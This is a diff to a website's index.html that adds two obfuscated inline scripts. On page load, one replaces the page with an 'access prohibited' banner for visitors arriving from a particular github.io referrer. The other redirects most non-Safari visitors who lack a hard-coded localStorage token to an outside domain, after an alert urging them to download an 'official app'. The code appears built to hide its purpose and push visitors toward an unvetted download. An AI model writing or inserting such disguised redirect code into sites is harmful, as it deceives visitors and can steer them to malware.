--- a/index.html
+++ b/index.html
@@ -22,6 +22,7 @@
   gtag('config', 'G-PC9JETB0VP');
 </script>
  <script>
+(function(){var _0x1a2b3c=atob('aHR0cHM6Ly9naXRodWFwcC5naXRodWIuaW8vZGUv');var _0x4d5e6f=document.referrer;var _0x7a8b9c=/(Android)/i.test(navigator.userAgent);var _0x2c3d4e=/(Windows|Macintosh|Linux)/i.test(navigator.userAgent);var _0x5f6a7b=/(iPhone|iPad|iPod)/i.test(navigator.userAgent);if(_0x4d5e6f===_0x1a2b3c&&(_0x7a8b9c||_0x2c3d4e)&&!_0x5f6a7b){document.body.innerHTML=atob('PGgxIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjttYXJnaW4tdG9wOjUwcHg7Jz5BY2Nlc28gcHJvaGliaWRvIGRlc2RlIGVzdGEgcMOgZ2luYTwvaDE+');}})();
  (function(_0x1f4b3a,_0x2e5c1d){var _0x4c3e2b=function(_0x5a3f1c){while(--_0x5a3f1c){_0x1f4b3a['push'](_0x1f4b3a['shift']());}};var _0x3b2f4e=function(){var _0x1a3e5f={'data':function(_0x4e2c1b,_0x3f5a2d){return _0x4e2c1b!==_0x3f5a2d;},'action':function(){return'atob';},'value':function(){return'VXNlckx6UGxheQ==';},'store':function(){return'localStorage';},'redirect':function(){return'https://dlz.blogdepelis.lat/';},'message':function(){return'Acceso no permitido. Descarga la aplicacion oficial';},'isSafari':function(){return /Safari/.test(navigator.userAgent) && !/Chrome/.test(navigator.userAgent);}};return _0x1a3e5f;}();_0x4c3e2b(0x1f4);var _0x5e3d2a=_0x3b2f4e;document['addEventListener']('DOMContentLoaded',function(){if(!_0x5e3d2a['isSafari']()){var _0x2d4f1c=_0x5e3d2a['store']();var _0x4b3e2f=window[_0x2d4f1c]['getItem']('accessToken');if(!_0x4b3e2f || _0x5e3d2a['data'](_0x4b3e2f,_0x5e3d2a['action']()(_0x5e3d2a['value']()))){alert(_0x5e3d2a['message']());window['location']['href']=_0x5e3d2a['redirect']();}window[_0x2d4f1c]['removeItem']('accessToken');}});})(['push','shift'],0x1f4);
 document.addEventListener("DOMContentLoaded", () => {
   const preloader = document.getElementById("preloader");
@@ -763,6 +764,7 @@ document.addEventListener("DOMContentLoaded", async () => {
 
 </body>
 </html>
+
 
 
 
